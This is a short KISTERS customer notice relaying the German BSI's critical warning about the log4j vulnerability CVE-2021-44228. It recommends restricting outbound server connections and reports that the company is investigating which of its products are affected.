2021-12-13

Latest warning from the German Federal Office for Information Security (BSI) entitled "Critical vulnerability in log4j published (CVE-2021-44228)".

[Warning (German)]

The logging library log4j is used in many Java applications. These include web servers exposed on the internet/intranet such as the Tomcat service, which is also used by KISTERS Software. As the vulnerability can be exploited on a large scale on the internet and this is apparently already happening, the BSI has now given it a rating of "4 / Red: The IT threat situation is extremely critical".

We therefore recommend that our customers check the security settings of their web servers at short notice and in particular implement the first measure recommended by the BSI:
Servers should generally only be allowed to establish connections (especially to the internet) that are absolutely necessary for the purpose of use. Other accesses should be prevented by appropriate control instances such as packet filters and application layer gateways. [BSI2021b].

We have implemented this measure for our customers who use the KISTERScloud.

Our development teams are currently investigating which software solutions could be specifically affected and which additional measures can be taken to reduce the risk of exploitation of the vulnerability.